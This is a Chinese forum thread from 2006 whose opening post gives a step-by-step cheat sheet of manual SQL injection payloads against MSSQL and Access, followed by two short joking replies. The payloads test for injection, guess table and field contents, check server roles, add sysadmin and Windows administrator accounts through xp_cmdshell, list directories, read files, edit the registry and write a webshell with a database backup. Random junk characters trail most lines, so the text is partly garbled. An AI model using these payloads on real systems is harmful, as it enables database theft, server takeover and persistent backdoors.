社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 5117阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 Km7HB!=<  
  2.初步判断是否是mssql ;and user>0 [xe(FFl+  
&ejJf{id  
  3.注入参数是字符'and [查询条件] and ''=' !C]0l  
H`odQkZ!  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' `dO)}}| y  
Xxhzzm-B  
  5.判断数据库系统 00X~/'!  
Wnm?a!j5  
  ;and (select count(*) from sysobjects)>0 mssql a NhI<.v  
9#Gz2u$  
  ;and (select count(*) from msysobjects)>0 access mxt fKPb  
Y3KKskhLx  
.aTu]i3l_  
E&ou(Q={  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 @0H}U$l  
1AiqB Rs  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 8@pY:AY  
3 (Bd`=9  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 =|_:H$94  
-T3 z@k  
  9.(1)猜字段的ascii值(access) =aR'S\<  
BV_rk^}Ur  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ~5g2~.&*  
' P5t tI#|  
  (2)猜字段的ascii值(mssql) zg L0v5vk  
{=};<;_F  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 Qk2^p^ T6  
+ExXhT  
  10.测试权限结构(mssql) }QrBN:a$(  
~IrrX,mp:  
L@xag-b i  
^oaFnzJdf  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- B7HNNX  
W?is8r:  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- /o%J / |  
6%?bl{pNn  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- Z&BJ/qk \-  
]U?)_P@}  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ,tqMMBwC~_  
3Run.Gv\  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- V/xGk9L~  
eFJ .)Z  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- *q**,_?;  
 |e49F  
  ;and 1=(select IS_MEMBER('db_owner'));-- u By[x 0  
\[u7y. b  
=M39I&N  
l`"i'P   
  11.添加mssql和系统的帐户 {6}H}_( ]  
\o}m]v i  
  ;exec master.dbo.sp_addlogin username;-- A9qbE  
  ;exec master.dbo.sp_password null,username,password;-- 5A^$!q P  
3jH-!M5  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 3 ,;;C(  
CRXIVver  
  ;exec master.dbo.xp_cmdshell 'net user username password BOqu$f+  
b7;`A~{9v  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- hdW}._  
,n )f=q*%  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- 6jS:_[p  
#Xdj:T<*  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- MC=pN(l  
Jw"fqr  
Q[sj/  
i b$2qy  
  12.(1)遍历目录 fH{ _X  
5ZpU><y  
  ;create table dirs(paths varchar(100), id int) abAX)R'  
H$G`e'`OZ  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' N`o[iHUj \  
V+04X"  
  ;and (select top 1 paths from dirs)>0 vSyR% j  
YS$42J_T  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) &?[uY5Mk  
<WPLjgtn3  
b{X,0a{*  
_4+'@u #  
  (2)遍历目录 |t<Uh,Bt  
/<"<N<X  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- -l)u`f^n|  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 Q:rQ;/b0/  
M^C|svm  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 4o|-v  
.lbo\v}2W  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 y+jOk6)W75  
T-.Q  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6sE%]u<V  
QV&yVH=Xs  
e#{,M8  
?7?hDw_Nk  
  13.mssql中的存储过程 IhRWa|{I  
l:Hm|9UZ  
  xp_regenumvalues 注册表根键, 子键 .A6i?iROe  
fm u;Pb]r  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 wgETL|3-  
A.[~}ywH  
  xp_regread 根键,子键,键值名 %t.L;G  
cZVVJUF  
  ;exec xp_regread +c&oF,=}!P  
?^f=7e8]  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 gjbSB6[  
vZ0K1UTEXY  
  xp_regwrite 根键,子键, 值名, 值类型, 值 e"I+5r",  
m@A?'gD  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 3]z%C'  
u[Ij4h.  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 )c; YR}tC  
}hoyjzv]L  
  xp_regdeletevalue 根键,子键,值名 }={TVs^  
Pjvzefp  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 !=/wpsH  
;kE|Vx  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 Of@ LEEh6  
\x(ILk|'c  
[v%j?  
p$S\l] ,  
  14.mssql的backup创建webshell f[wA ]&  
|L}1@0i  
  use model )0\"8}!  
|``rSEXYs  
  create table cmd(str image); L9"yQD^R7?  
'Edm /+  
  insert into cmd(str) values (''); :b~5nftr  
wR(>' ?  
  backup database model to disk='c:\l.asp'; z\F#td{r  
$F#eD 0|  
#uc9eh}CWO  
j92X"yB  
  15.mssql内置函数 d~hN`ff  
Vs"1:gi&  
  ;and (select @@version)>0 获得Windows的版本号 \H&8.<HJ  
dm(Xy'*iQ  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa VnU/_# n  
Cu\6VnW_6  
  ;and (select user_name())>0 爆当前系统的连接用户 p)k5Uh"  
v9_7OMl/x  
  ;and (select db_name())>0 得到当前连接的数据库 o1k X`Eu  
# s}&  
:svKE.7{  
mD"[z}r)  
  16.简洁的webshell gXb * zt2  
FdcmA22k*  
  use model [ 11D7L%1t  
xj#anr  
  create table cmd(str image); =1SG^rp  
2m8|0E|@  
  insert into cmd(str) values (''); wRj||yay#-  
Z !81\5  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八